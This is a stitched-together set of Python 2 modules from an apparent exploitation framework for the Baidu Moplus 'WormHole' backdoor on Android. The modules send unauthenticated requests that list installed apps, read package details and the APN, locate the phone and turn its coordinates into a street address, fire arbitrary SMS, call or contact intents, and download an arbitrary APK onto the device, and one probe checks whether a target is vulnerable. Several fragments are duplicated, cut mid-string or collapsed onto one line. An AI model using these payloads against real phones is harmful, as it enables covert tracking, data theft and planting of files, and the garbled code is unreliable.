获取安装程序列表 ''', }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request path for the installed-app query. The string carries only fixed
# markers (`mcmdf=inapp_`, `callback=t`) and no credential or token.
payload = "getapplist?mcmdf=inapp_&callback=t"
# This module declares no operator-settable options.
options = AttribDict()


def callback(self, arg):
    """Display the package list contained in the reply to `getapplist`.

    `arg` unpacks into a success flag and the raw response text. On success
    the response is parsed, shown as a two-column table and the package
    names are stored on `cache.getapplist`.
    """
    _, res = arg
    if _:
        self.ui.notify.success('Get success!')
        # res[7:-2] drops a 7-character prefix and a 2-character suffix
        # before JSON parsing -- presumably the `t && t(` ... `);` callback
        # wrapper; confirm against a real response.
        try:
            data = json.loads(res[7:-2])
            packages = data['package_infos']
            # NOTE(review): package_name / version_name come from the remote
            # response and are displayed as received.
            self.ui.table(
                'Found (%d) app..' % len(packages),
                [45, 31],
                ['PACKAGE_NAME', 'VERSION_NAME'],
                [[p['package_name'], p['version_name']] for p in packages]
            )
            cache.getapplist = [p['package_name'] for p in packages]
        except Exception, e:
            # Any failure in the block above (bad JSON, missing key, display
            # error) is reported under the single "(PARSE JSON)" label.
            self.ui.notify.error('(PARSE JSON) -> %s' % e)
    else:
        self.ui.notify.error('Get fail (%s)!' % res)


register(GetApplist)
set URL http://xxx.com/a.apk set SAVE_PATH downloads/ 就会把 xxx.com/a.apk 文件下载到 /sdcard/downloads/ 目录下 ''', }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request template. The {self.options.*} placeholders are filled in elsewhere
# in the framework; no URL-encoding of the values is visible in this file.
# Defensive note: nothing in this request string authenticates the caller --
# it carries only fixed markers plus the caller-chosen source URL and
# on-device save path.
payload = "downloadfile?querydown=download&downloadurl={self.options.URL}&savepath" \
    "={self.options.SAVE_PATH}&filesize=1024&callback=t&mcmdf=inapp_"
options = AttribDict()
# Default is a list of scheme prefixes (presumably completion hints);
# `callback` treats URL as a string, so it is expected to be set before use.
options.URL = ['http://', 'https://', 'ftp://', 'file://']
options.SAVE_PATH = "."


def callback(self, arg):
    """Report whether the `downloadfile` request was acknowledged.

    `arg` unpacks into a success flag and the raw response text. Only the
    exact reply `t && t({"error":0});` counts as success; anything else,
    including a failed request, is reported as a download failure.
    """
    _, res = arg
    if _:
        if res == 't && t({"error":0});':
            # The reported location is built locally from SAVE_PATH and the
            # last path segment of URL; it is not read back from the reply.
            self.ui.notify.success('Download success!').info(
                'Save in /sdcard/%s%s' % (self.options.SAVE_PATH, self.options.URL.split('/')[-1]))
        else:
            self.ui.notify.error('Download fail (%s)!' % res)
    else:
        self.ui.notify.error('Download fail (%s)!' % res)


register(DownloadFile)
PACKAGENAME: 要获取的包名 eg: set PACKAGENAME com.android.browser """, }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request template; {self.options.PACKAGENAME} is filled in elsewhere in the
# framework. The string carries no credential, only fixed markers.
payload = "getpackageinfo?packagename={self.options.PACKAGENAME}&mcmdf=inapp_&callback=t"
options = AttribDict()
# Pre-populated from `cache.getapplist` when that key exists, otherwise an
# empty list.
options.PACKAGENAME = cache.getapplist if cache.has_key("getapplist") else []


def callback(self, arg):
    """Show the fields of the first `package_infos` entry as a table.

    `arg` unpacks into a success flag and the raw response text.
    """
    _, res = arg
    if _:
        # res[7:-2] drops a 7-character prefix and a 2-character suffix
        # before JSON parsing -- presumably the `t && t(` ... `);` callback
        # wrapper; confirm against a real response.
        info = json.loads(res[7:-2])
        if len(info) > 0:
            # NOTE(review): if "package_infos" is absent or empty, the
            # `[0]` lookups below raise and nothing here catches it; the
            # json.loads call above is likewise unguarded.
            self.ui.notify.info("Get success!").table(
                "App Info...",
                [21, 21],
                ["Options", "Info"],
                [[p, info.get("package_infos")[0].get(p)] for p in info.get("package_infos")[0].keys()],
            )
        else:
            self.ui.notify.error("Get fail (%s)!" % res)
    else:
        self.ui.notify.error("Get fail (%s)!" % res)


register(PackageInfo)
# NOTE: the class header lies outside this fragment; the assignments and
# `callback` below are members of that class, and `register(...)` at the end
# runs at module level.
ui = UI()
info = {
    "Author": "Medici.Yan",
    "Description": u''' 获取本地字符串 ''',
}
# Request path for the local-string query; it carries only fixed markers.
payload = "getlocstring?mcmdf=inapp_&callback=t"
options = AttribDict()  # no operator-settable options


def callback(self, arg):
    """Show the `locstring` value from the reply to `getlocstring`.

    `arg` unpacks into a success flag and the raw response text. The raw
    pair is echoed to stdout before any handling.
    """
    ok, body = arg
    print(arg)  # debug echo of the raw (flag, response) pair
    if not ok:
        self.ui.notify.error('Get fail (%s)!' % body)
        return
    # body[7:-2] drops a 7-character prefix and a 2-character suffix before
    # parsing -- presumably the callback wrapper; confirm against a real reply.
    data = json.loads(body[7:-2])
    if len(data) > 0:
        self.ui.notify.info('Get success!').success(data.get('locstring'))
    else:
        self.ui.notify.error('Get fail (%s)!' % body)


register(Getlocstring)
PACKAGENAME: 要获取的包名 eg: set PACKAGENAME com.android.browser ''', }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request template; {self.options.PACKAGENAME} is filled in elsewhere in the
# framework. The string carries no credential, only fixed markers.
payload = "getpackageinfo?packagename={self.options.PACKAGENAME}&mcmdf=inapp_&callback=t"
options = AttribDict()
# Pre-populated from `cache.getapplist` when that key exists, otherwise an
# empty list.
options.PACKAGENAME = cache.getapplist if cache.has_key('getapplist') else []


def callback(self, arg):
    """Show the fields of the first `package_infos` entry as a table.

    `arg` unpacks into a success flag and the raw response text.
    """
    _, res = arg
    if _:
        # res[7:-2] drops a 7-character prefix and a 2-character suffix
        # before JSON parsing -- presumably the `t && t(` ... `);` callback
        # wrapper; confirm against a real response.
        info = json.loads(res[7:-2])
        if len(info) > 0:
            # NOTE(review): if 'package_infos' is absent or empty, the
            # `[0]` lookups below raise and nothing here catches it; the
            # json.loads call above is likewise unguarded.
            self.ui.notify.info('Get success!').table(
                'App Info...',
                [21, 21],
                ['Options', 'Info'],
                [[p, info.get('package_infos')[0].get(p)] for p in info.get('package_infos')[0].keys()]
            )
        else:
            self.ui.notify.error('Get fail (%s)!' % res)
    else:
        self.ui.notify.error('Get fail (%s)!' % res)


register(PackageInfo)
set SAVE_PATH downloads/ 就会把 xxx.com/a.apk 文件下载到 /sdcard/downloads/ 目录下 """, }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request template. The {self.options.*} placeholders are filled in elsewhere
# in the framework; no URL-encoding of the values is visible in this file.
# Defensive note: nothing in this request string authenticates the caller --
# it carries only fixed markers plus the caller-chosen source URL and
# on-device save path.
payload = (
    "downloadfile?querydown=download&downloadurl={self.options.URL}&savepath"
    "={self.options.SAVE_PATH}&filesize=1024&callback=t&mcmdf=inapp_"
)
options = AttribDict()
# Default is a list of scheme prefixes (presumably completion hints);
# `callback` treats URL as a string, so it is expected to be set before use.
options.URL = ["http://", "https://", "ftp://", "file://"]
options.SAVE_PATH = "."


def callback(self, arg):
    """Report whether the `downloadfile` request was acknowledged.

    `arg` unpacks into a success flag and the raw response text. Only the
    exact reply `t && t({"error":0});` counts as success; anything else,
    including a failed request, is reported as a download failure.
    """
    _, res = arg
    if _:
        if res == 't && t({"error":0});':
            # The reported location is built locally from SAVE_PATH and the
            # last path segment of URL; it is not read back from the reply.
            self.ui.notify.success("Download success!").info(
                "Save in /sdcard/%s%s" % (self.options.SAVE_PATH, self.options.URL.split("/")[-1])
            )
        else:
            self.ui.notify.error("Download fail (%s)!" % res)
    else:
        self.ui.notify.error("Download fail (%s)!" % res)


register(DownloadFile)
try: data = json.loads(data) self.ui.notify.info('Get success!') if data.has_key('coords'): info = data['coords'] # print ([p, info.get(p)] for p in info.keys()) self.ui.table(u'目标地理位置', [20, 21], ['Options', 'Info'], [ [u'citycode', data['citycode']], [u'longitude', info['longitude']], [u'latitude', info['latitude']], [u'accuracy', info['accuracy']], ]) location_api = "http://api.map.baidu.com/?qt=rgc&x={longitude}&y={latitude}&" \ "dis_poi=1&fromproduct=jsapi&res=api".format( longitude=info['longitude'], latitude=info["latitude"] ) req = urllib2.Request(location_api) resp = urllib2.urlopen(req) lodata = json.loads(resp.read()) if lodata: self.ui.success(lodata["content"]["address"]).success( lodata["content"]["poi_desc"]) except: self.ui.error('Error!') else: self.ui.error('Error!') register(Geolocation)
# NOTE: the class header lies outside this fragment; `__init__`, the
# assignments and `callback` below are members of that class, and
# `register(...)` at the end runs at module level.
def __init__(self):
    """Hold no per-instance state; the members below are class attributes."""


ui = UI()
info = {
    "Author": "Medici.Yan",
    "Description": u''' 发送原始字串注意拼接字符串 set RAW sendintent?intent=sms:110& payload = "{self.options.RAW}mcmdf=inapp_&callback=t" ''',
}
# Request template: the operator-supplied RAW text is placed directly in
# front of the fixed trailer, so RAW must already end with `&` (or `?`).
# The {self.options.RAW} placeholder is filled in elsewhere in the framework.
payload = "{self.options.RAW}mcmdf=inapp_&callback=t"
options = AttribDict()
options.RAW = ""


def callback(self, arg):
    """Report the request outcome, then print the raw reply.

    `arg[0]` is the success flag and `arg[1]` the response; the response is
    printed in both the success and the failure case.
    """
    report, text = (
        (self.ui.success, 'Success!') if arg[0] else (self.ui.error, 'Error!')
    )
    report(text)
    # The reply is shown exactly as received, without parsing.
    self.ui.p(arg[1], self.ui.GREEN)


register(RawReq)
# coding:utf-8
from libs.core.register import register
from libs.core.attrdict import AttribDict
from libs.ui import UI


# Module that requests the `getapn` path and displays part of the reply.
# Sending the request is handled elsewhere in the framework (not in this file).
class GetApn():
    ui = UI()

    info = {
        "Author": "Medici.Yan",
        "Description": u''' 获取 apn ''',
    }

    # Request path; it carries only fixed markers, no credential or token.
    payload = "getapn?mcmdf=inapp_&callback=t"

    # This module declares no operator-settable options.
    options = AttribDict()

    def callback(self, arg):
        """Show the APN portion of the reply, or a generic error.

        `arg[0]` is the success flag and `arg[1]` the raw response text.
        """
        if not arg[0]:
            self.ui.error('Error!')
            return
        notice = self.ui.notify.info('Get success!')
        # [8:-13] trims a fixed-length prefix and suffix from the reply --
        # presumably the wrapper around the APN value; confirm against a
        # real response, since no parsing or validation is done here.
        notice.success(arg[1][8:-13])


register(GetApn)
self.ui.notify.info('Get success!') if data.has_key('coords'): info = data['coords'] # print ([p, info.get(p)] for p in info.keys()) self.ui.table( u'目标地理位置', [20, 21], ['Options', 'Info'], [ [u'citycode', data['citycode']], [u'longitude', info['longitude']], [u'latitude', info['latitude']], [u'accuracy', info['accuracy']], ]) location_api = "http://api.map.baidu.com/?qt=rgc&x={longitude}&y={latitude}&" \ "dis_poi=1&fromproduct=jsapi&res=api".format( longitude=info['longitude'], latitude=info["latitude"] ) req = urllib2.Request(location_api) resp = urllib2.urlopen(req) lodata = json.loads(resp.read()) if lodata: self.ui.success(lodata["content"]["address"]).success(lodata["content"]["poi_desc"]) except: self.ui.error('Error!') else: self.ui.error('Error!') register(Geolocation)
def callback(self, arg): _, res = arg if _: info = json.loads(res[7:-2]) if len(info) > 0: info_keys = info.keys() info_keys.remove('error') data = info.get(info_keys[0]) self.ui.notify.info('Get success!') if hasattr(data, '__iter__'): if self.options.INFOTYPE == "getapplist": self.ui.table( 'Found (%d) app..' % len(data), [45, 31], ['PACKAGE_NAME', 'VERSION_NAME'], [[p['package_name'], p['version_name']] for p in data] ) cache.getapplist = [p['package_name'] for p in data] else: self.ui.success(info.get(info_keys[0])) else: self.ui.notify.error('Get fail (%s)!' % res) else: self.ui.notify.error('Get fail (%s)!' % res) register(GetInfo)
# NOTE: the class header lies outside this fragment; the assignments and
# `callback` below are members of that class, and `register(...)` at the end
# runs at module level.
ui = UI()
info = {
    "Author": "Medici.Yan",
    "Description": u''' 获取本地字符串 ''',
}
# Request path for the local-string query; it carries only fixed markers.
payload = "getlocstring?mcmdf=inapp_&callback=t"
options = AttribDict()  # no operator-settable options


def callback(self, arg):
    """Show the `locstring` value from the reply to `getlocstring`.

    `arg` unpacks into a success flag and the raw response text. The raw
    pair is echoed to stdout before any handling.
    """
    ok, body = arg
    print(arg)  # debug echo of the raw (flag, response) pair
    if not ok:
        self.ui.notify.error('Get fail (%s)!' % body)
        return
    # body[7:-2] drops a 7-character prefix and a 2-character suffix before
    # parsing -- presumably the callback wrapper; confirm against a real reply.
    data = json.loads(body[7:-2])
    if len(data) > 0:
        self.ui.notify.info('Get success!').success(data.get('locstring'))
    else:
        self.ui.notify.error('Get fail (%s)!' % body)


register(Getlocstring)
"Description": u''' 获取安装程序列表 ''', }
# NOTE: this fragment begins inside the module's `info` dict, so the class
# header and the opening of `info` are not visible. The members below belong
# to that class body; `register(...)` at the end is module level.

# Request path for the installed-app query. The string carries only fixed
# markers (`mcmdf=inapp_`, `callback=t`) and no credential or token.
payload = "getapplist?mcmdf=inapp_&callback=t"
# This module declares no operator-settable options.
options = AttribDict()


def callback(self, arg):
    """Display the package list contained in the reply to `getapplist`.

    `arg` unpacks into a success flag and the raw response text. On success
    the response is parsed, shown as a two-column table and the package
    names are stored on `cache.getapplist`.
    """
    _, res = arg
    if _:
        self.ui.notify.success('Get success!')
        # res[7:-2] drops a 7-character prefix and a 2-character suffix
        # before JSON parsing -- presumably the `t && t(` ... `);` callback
        # wrapper; confirm against a real response.
        try:
            data = json.loads(res[7:-2])
            packages = data['package_infos']
            # NOTE(review): package_name / version_name come from the remote
            # response and are displayed as received.
            self.ui.table('Found (%d) app..' % len(packages), [45, 31], ['PACKAGE_NAME', 'VERSION_NAME'],
                          [[p['package_name'], p['version_name']] for p in packages])
            cache.getapplist = [p['package_name'] for p in packages]
        except Exception, e:
            # Any failure in the block above (bad JSON, missing key, display
            # error) is reported under the single "(PARSE JSON)" label.
            self.ui.notify.error('(PARSE JSON) -> %s' % e)
    else:
        self.ui.notify.error('Get fail (%s)!' % res)


register(GetApplist)
file:// 打开本地文件 mailto: 发送邮件 content://contacts/people/1 查看编号为 1 的用户名片 其它的自行补充 ''', }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request template; {self.options.INTENT} is filled in elsewhere in the
# framework and no URL-encoding of the value is visible in this file.
# Defensive note: the request string carries only fixed markers and the
# caller-chosen intent URI -- no credential or token.
payload = "sendintent?intent={self.options.INTENT}&mcmdf=inapp_&callback=t"
options = AttribDict()
# URI prefixes offered for INTENT (presumably completion hints for the
# operator; the final value is expected to be a single string).
options.INTENT = [
    'sms:',
    'tel:',
    'geo:',
    'smsto:',
    'http://',
    'file://',
    'mailto:',
    'content://contacts/people/',
]


def callback(self, arg):
    """Report only the success flag in `arg[0]`.

    The response body is not inspected, so "Success!" means the request
    completed, not that the intent had any effect on the device.
    """
    if arg[0]:
        self.ui.success('Success!')
    else:
        self.ui.error('Error!')


register(SendIntent)
其它的自行补充 ''', }
# NOTE: this fragment begins inside the module's description string, so the
# class header and the opening of `info` are not visible. The members below
# belong to that class body; `register(...)` at the end is module level.

# Request template; {self.options.INTENT} is filled in elsewhere in the
# framework and no URL-encoding of the value is visible in this file.
# Defensive note: the request string carries only fixed markers and the
# caller-chosen intent URI -- no credential or token.
payload = "sendintent?intent={self.options.INTENT}&mcmdf=inapp_&callback=t"
options = AttribDict()
# URI prefixes offered for INTENT (presumably completion hints for the
# operator; the final value is expected to be a single string).
options.INTENT = [
    'sms:',
    'tel:',
    'geo:',
    'smsto:',
    'http://',
    'file://',
    'mailto:',
    'weixin://',
    'content://contacts/people/',
    'market://details?id=',
    'market://search?q=',
]


def callback(self, arg):
    """Report only the success flag in `arg[0]`.

    The response body is not inspected, so "Success!" means the request
    completed, not that the intent had any effect on the device.
    """
    if arg[0]:
        self.ui.success('Success!')
    else:
        self.ui.error('Error!')


register(SendIntent)
# coding:utf-8
from libs.core.register import register
from libs.core.attrdict import AttribDict
from libs.ui import UI


# Probe module: requests `getserviceinfo` and classifies the target from the
# reply text. Sending the request is handled elsewhere in the framework.
class Check():
    ui = UI()

    # Metadata about this PoC.
    info = {
        "Author": "Medici.Yan",
        "Description": u''' 检查 moplus WormHole ''',
    }

    # Request path sent to the target; it carries only fixed markers.
    payload = "getserviceinfo?mcmdf=inapp_&callback=t"

    # Parameters the operator sets manually (none for this module).
    options = AttribDict()

    def callback(self, arg):
        """Classify the target from the reply to `getserviceinfo`.

        `arg` unpacks into a success flag and the response text. The target
        is reported as vulnerable only when the request succeeded and the
        text contains the marker below.
        """
        ok, body = arg
        marker = 'packagename":"com.baidu.'
        # NOTE(review): this is a plain substring match, and every other
        # outcome (failed request, unexpected reply format) is reported as
        # "not vulnerable" -- treat a negative result as inconclusive.
        if ok and marker in body:
            self.ui.notify.success('Target is vulnerable!')
            return
        self.ui.notify.error('Target is not vulnerable!')


# Register the module with the framework.
register(Check)
from libs.core.attrdict import AttribDict
from libs.ui import UI


# Probe module: requests `getserviceinfo` and classifies the target from the
# reply text. Sending the request is handled elsewhere in the framework.
class Check():
    ui = UI()

    # Metadata about this PoC.
    info = {
        "Author": "Medici.Yan",
        "Description": u''' 检查 moplus WormHole ''',
    }

    # Request path sent to the target; it carries only fixed markers.
    payload = "getserviceinfo?mcmdf=inapp_&callback=t"

    # Parameters the operator sets manually (none for this module).
    options = AttribDict()

    def callback(self, arg):
        """Classify the target from the reply to `getserviceinfo`.

        `arg` unpacks into a success flag and the response text. The target
        is reported as vulnerable only when the request succeeded and the
        text contains the marker below.
        """
        ok, body = arg
        marker = 'packagename":"com.baidu.'
        # NOTE(review): this is a plain substring match, and every other
        # outcome (failed request, unexpected reply format) is reported as
        # "not vulnerable" -- treat a negative result as inconclusive.
        if ok and marker in body:
            self.ui.notify.success('Target is vulnerable!')
            return
        self.ui.notify.error('Target is not vulnerable!')


# Register the module with the framework.
register(Check)